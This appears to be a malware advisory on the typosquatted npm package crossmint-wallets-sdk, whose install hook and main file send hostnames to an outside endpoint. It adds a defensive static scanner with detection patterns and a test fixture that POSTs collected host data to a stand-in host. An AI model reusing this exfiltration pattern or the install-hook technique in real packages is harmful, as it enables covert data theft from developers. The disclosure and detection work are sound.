MAL-2026-6545

Malicious code in crossmint-wallets-sdk (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (dd4caebfba35b43bf10f156fe687f455e95b09a514b8644fe1a900b63f1bf78a)

The package name impersonates the Crossmint wallet SDK family. Both preinstall.js and index.js import child_process, capture host identifiers (the hostname is read on lines 7 and 9 respectively), and POST the collected data via https.request to a hardcoded external endpoint (lines 12 and 23 respectively). The preinstall.js path fires automatically on `npm install` before any user code runs, giving the publisher install-time data exfiltration from any developer or build system that installs this package. The combination of child_process, hostname collection, and an outbound POST in a preinstall lifecycle script, in a package whose name typosquats a known wallet SDK, matches the active-attack credential/reconnaissance exfiltration fingerprint.
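A static triage check for the fingerprint described above, as an added example that is not part of the advisory or of Amazon Inspector's own detection logic. The function `scanPackage`, the regex heuristics, and the in-memory sample packages (including the `collector.example.invalid` host) are constructed for illustration.

```javascript
// Added example: flag files that an npm package runs at install or load time
// and that combine child_process + host identifier collection + https.request.
const SIGNALS = {
  childProcess: /require\(\s*['"](?:node:)?child_process['"]\s*\)|from\s+['"](?:node:)?child_process['"]/,
  hostIdentifier: /\bhostname\s*\(|['"`]hostname['"`]/, // os.hostname() or exec('hostname')
  outboundHttps: /\bhttps\.request\s*\(/,
};
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// files: { relativePath: sourceText }. Returns one finding per executed file
// that shows all three signals; nothing from the package is ever executed.
function scanPackage(files) {
  const manifest = JSON.parse(files['package.json'] || '{}');
  const scripts = manifest.scripts || {};
  const targets = new Map(); // file -> how it gets executed
  for (const hook of INSTALL_HOOKS) {
    const m = /\bnode\s+(?:\.\/)?([\w./-]+\.js)\b/.exec(scripts[hook] || '');
    if (m) targets.set(m[1], `${hook} lifecycle script (runs on npm install)`);
  }
  const main = (manifest.main || 'index.js').replace(/^\.\//, '');
  if (!targets.has(main)) targets.set(main, 'main entry (runs on require)');

  const findings = [];
  for (const [file, trigger] of targets) {
    const src = files[file];
    if (typeof src !== 'string') continue; // referenced file not shipped
    const hits = Object.keys(SIGNALS).filter((k) => SIGNALS[k].test(src));
    if (hits.length === Object.keys(SIGNALS).length) findings.push({ file, trigger, hits });
  }
  return findings;
}

// Constructed fixtures (not the real package contents).
const STUB = [
  "const cp = require('child_process');",
  "const os = require('os');",
  "const https = require('https');",
  "const id = os.hostname();",
  "const req = https.request({ host: 'collector.example.invalid', method: 'POST' });",
].join('\n');
const SAMPLE_FLAGGED = {
  'package.json': JSON.stringify({ main: 'index.js', scripts: { preinstall: 'node preinstall.js' } }),
  'preinstall.js': STUB,
  'index.js': STUB,
};
const SAMPLE_CLEAN = {
  'package.json': JSON.stringify({ main: 'index.js', scripts: { test: 'node test.js' } }),
  'index.js': "const https = require('https');\nmodule.exports = (u, cb) => https.get(u, cb);",
};
console.log(JSON.stringify(scanPackage(SAMPLE_FLAGGED), null, 2));
```

Installing with `npm install --ignore-scripts` keeps the preinstall hook from running, but the index.js path described above still executes when the package is loaded.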

Affected packages

npm / crossmint-wallets-sdk
Introduced in: 0

No fixed version published yet for crossmint-wallets-sdk (npm). Pin to a known-safe version or switch to an alternative.

References